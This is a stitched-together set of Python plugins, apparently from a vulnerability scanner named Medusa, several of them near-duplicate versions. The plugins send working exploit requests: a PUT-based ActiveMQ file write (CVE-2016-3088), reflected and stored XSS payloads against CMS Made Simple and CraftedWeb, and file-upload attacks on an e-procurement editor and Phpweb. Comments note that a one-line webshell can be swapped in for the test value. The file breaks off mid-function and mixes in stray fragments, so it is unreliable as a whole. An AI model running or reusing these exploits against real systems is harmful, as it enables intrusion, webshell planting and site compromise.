def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
PayloadPoc = "/fileserver/Medusa.txt"
PayloadUrl = scheme + '://' + url + ':' + str(port)+PayloadPoc
PayloadCode = ClassCongregation.randoms().result(50)+'@Medusa'
Headers["Connection"]="close"
s = requests.session()
resp = s.put(PayloadUrl, data=PayloadCode, headers=Headers, proxies=proxies,timeout=3,verify=False)
code = resp.status_code
resp2=s.get(PayloadUrl, headers=Headers,proxies=proxies, timeout=3).text
if code==204 and resp2.find(PayloadCode)!=-1:
Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format(url, PayloadUrl,PayloadCode)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l=ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
RD = ClassCongregation.randoms().result(20)
payload = "/k/cms/cmsmadesimple/install/index.php"
data = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert({})%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US'''.format(
RD)
payload_url = url + payload
resp = requests.post(payload_url,
data=data,
headers=Headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find(
'''<a href="$("<img/src='x'/onerror=alert()>'''.format(
RD)) != -1:
Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD=ClassCongregation.randoms().result(20)
payload = "/cmsms2.2.7/admin/siteprefs.php"
data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''
payload_url = scheme + "://" + url +":"+ str(port) + payload
resp = requests.post(payload_url, data=data,headers=Headers, proxies=proxies,timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find(RD) != -1 :
Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD=ClassCongregation.randoms().result(20)
payload = "/cmsms2.2.7/admin/siteprefs.php"
data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.post(payload_url, data=data,headers=headers, proxies=proxies,timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find(RD) != -1 :
Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs) -> None:
url = kwargs.get("Url") #获取传入的url参数
Headers = kwargs.get("Headers") #获取传入的头文件
proxies = kwargs.get("Proxies") #获取传入的代理参数
try:
PayloadPoc = "/fileserver/Medusa.txt"
PayloadUrl = url + PayloadPoc
PayloadCode = ClassCongregation.randoms().result(50) + '@Medusa'
Headers["Connection"] = "close"
s = requests.session()
resp = s.put(PayloadUrl,
data=PayloadCode,
headers=Headers,
proxies=proxies,
timeout=3,
verify=False)
code = resp.status_code
resp2 = s.get(PayloadUrl, headers=Headers, proxies=proxies,
timeout=3).text
if code == 204 and resp2.find(PayloadCode) != -1:
Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format(
url, PayloadUrl, PayloadCode)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
RD = ClassCongregation.randoms().result(20)
payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(
RD)
payload_url = url + payload
resp = requests.get(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find(
'<script>alert({})</script>'.format(RD)) != -1:
Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
RD = ClassCongregation.randoms().result(20)
payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert({})</script>&m1_filename=Adherents-0.2.6.xml".format(
RD)
payload_url = url + payload
resp = requests.get(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find(
'<script>alert({})</script>'.format(RD)) != -1:
Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD=ClassCongregation.randoms().result(20)
payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(RD)
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find('<script>alert({})</script>'.format(RD)) != -1 :
Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,Token,proxies=None):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD=ClassCongregation.randoms().result(20)
payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD)
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.post(payload_url, data=data,headers=headers,proxies=proxies, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find(RD) != -1 :
Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,Token).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
PayloadPoc = "/fileserver/Medusa.txt"
PayloadUrl = scheme + '://' + url + ':' + str(port) + PayloadPoc
PayloadCode = ClassCongregation.randoms().result(50) + '@Medusa'
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':
'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'User-Agent': RandomAgent,
'Connection': 'close',
}
s = requests.session()
resp = s.put(PayloadUrl,
data=PayloadCode,
headers=headers,
proxies=proxies,
timeout=3,
verify=False)
code = resp.status_code
resp2 = s.get(PayloadUrl, headers=headers, proxies=proxies,
timeout=3).text
if code == 204 and resp2.find(PayloadCode) != -1:
Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format(
url, PayloadUrl, PayloadCode)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
RD=ClassCongregation.randoms().result(20)
payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD)
payload_url = url + payload
resp = requests.post(payload_url, data=data,headers=Headers,proxies=proxies, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find(RD) != -1 :
Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD = ClassCongregation.randoms().result(20)
payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(
RD)
payload_url = scheme + "://" + url + ":" + str(port) + payload
resp = requests.post(payload_url,
data=data,
headers=Headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find(RD) != -1:
Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD = ClassCongregation.randoms().result(20)
payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(
RD)
payload_url = scheme + "://" + url + ":" + str(port) + payload
resp = requests.get(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find(
'<script>alert({})</script>'.format(RD)) != -1:
Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
#
# except:
# pass
# !/usr/bin/env python
# -*- coding: utf-8 -*-
# if __name__ == '__main__':
# UrlList=[]
# ThredList=[]
# la=[]
# with open("6.txt", 'r', encoding='UTF-8') as f:
# line = f.readline()
# while line:
# ThredList.append(threading.Thread(target=medusa, args=(line.strip("\r\n",),"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36",),kwargs={"Uid":"Ayanami Rei","Sid":"Soryu Asuka Langley"}))
# line = f.readline()
# for t in ThredList: # 开启列表中的多线程
# t.start()
# for p in ThredList: # 开启列表中的多线程
# p.join()
# medusa("","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36")
#celery -A Web.Workbench.Tasks worker --loglevel=info --pool=solo
#python3 manage.py runserver 0.0.0.0:9999
#mitmdump -s ProxyServer.py --proxyauth any --listen-host "0.0.0.0" --listen-port 9747
#.\redis-server.exe redis.windows.conf
# git commit -m "v0.82.3:palm_tree:"
#find . -type d -name '__pycache__' | xargs rm -rf
import ClassCongregation
for i in range(1, 100000):
a = ClassCongregation.randoms().result(10)
print(a)
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
RD = ClassCongregation.randoms().result(20)
payload = "/library/editornew/Editor/img_save.asp"
payload_url = url + payload
data = '''
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_src"; filename="123.cer"
Content-Type: application/x-x509-ca-cert
{}
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="Submit"
提交
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_alt"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_align"
baseline
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_border"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="newid"
45
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_hspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_vspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA--
'''.format(RD).encode('utf-8')
Headers['Content-Type'] = 'application/x-www-form-urlencoded'
Headers[
'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
resp = requests.post(payload_url,
data=data,
headers=Headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
if match:
payload_url2 = url + "/library/editornew/Editor/NewImage/" + match.group(
1)
resp2 = requests.get(payload_url2,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con2 = resp2.text
code2 = resp2.status_code
#如果要上传shell直接把testvul这个值改为一句话就可以
if code2 == 200 and con2.lower().find(RD) != -1:
Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
url, payload_url2, con2)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, resp2, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
RD = ClassCongregation.randoms().result(20)
payload = "/library/editornew/Editor/img_save.asp"
payload_url = scheme + "://" + url + ":" + str(port) + payload
data = '''
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_src"; filename="123.cer"
Content-Type: application/x-x509-ca-cert
{}
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="Submit"
提交
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_alt"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_align"
baseline
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_border"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="newid"
45
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_hspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_vspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA--
'''.format(RD)
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.post(payload_url,
data=data,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
if match:
payload_url2 = scheme + "://" + url + ":" + str(
port) + "/library/editornew/Editor/NewImage/" + match.group(1)
resp2 = s.get(payload_url2,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con2 = resp2.text
code2 = resp2.status_code
#如果要上传shell直接把testvul这个值改为一句话就可以
if code2 == 200 and con2.lower().find(RD) != -1:
Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
url, payload_url2, con2)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
payload1 = "/base/post.php"
payload_url1 = url + payload1
dada = "act=appcode"
payload2 = "/base/appfile.php"
payload_url2 = url + payload2
ran = ClassCongregation.randoms().result(10)
payload_url3 = url + "/effect/source/bg/{}.txt".format(ran)
Headers1 = Headers
Headers2 = Headers
Headers1['Accept'] = '*/*'
Headers1['Content-Type'] = 'application/x-www-form-urlencoded'
Headers2['Accept'] = '*/*'
Headers2[
'Content-Type'] = 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE'
resp = requests.post(payload_url1,
data=dada,
proxies=proxies,
headers=Headers1,
timeout=5,
verify=False)
con = resp.text
k = re.match('k=(.*?)&', con, re.M | re.I).group(1) # 提取K的值
md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()
dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="file"; filename="{}.txt"
Content-Type: application/octet-stream
{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="t"
1
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="m"
{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="act"
upload
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="r_size"
10
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="submit"
getshell
------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en)
resp2 = requests.post(payload_url2,
data=dada2,
proxies=proxies,
headers=Headers2,
timeout=5,
verify=False)
resp3 = requests.get(payload_url3,
headers=Headers1,
proxies=proxies,
timeout=5,
verify=False)
code3 = resp3.status_code
con3 = resp3.text
if code3 == 200 and con3.find(ran) != -1:
Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format(
url, payload_url2, dada2, payload_url3, con3)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, resp3, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload1 = "/base/post.php"
payload_url1 = scheme + '://' + url + ':' + str(port) + payload1
dada = "act=appcode"
payload2 = "/base/appfile.php"
payload_url2 = scheme + '://' + url + ':' + str(port) + payload2
ran = ClassCongregation.randoms().result(10)
payload_url3 = scheme + '://' + url + ':' + str(
port) + "/effect/source/bg/{}.txt".format(ran)
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
}
headers2 = {
'Accept-Encoding':
'gzip, deflate',
'Accept':
'*/*',
'Accept-Language':
'en',
'User-Agent':
RandomAgent,
'Content-Type':
'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE',
}
resp = requests.post(payload_url1,
data=dada,
proxies=proxies,
headers=headers,
timeout=5,
verify=False)
con = resp.text
k = re.match('k=(.*?)&', con, re.M | re.I).group(1) # 提取K的值
md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()
dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="file"; filename="{}.txt"
Content-Type: application/octet-stream
{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="t"
1
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="m"
{}
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="act"
upload
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="r_size"
10
------WebKitFormBoundary0ZoOKoVwkSlGFfVE
Content-Disposition: form-data; name="submit"
getshell
------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en)
resp2 = requests.post(payload_url2,
data=dada2,
proxies=proxies,
headers=headers2,
timeout=5,
verify=False)
resp3 = requests.get(payload_url3,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
code3 = resp3.status_code
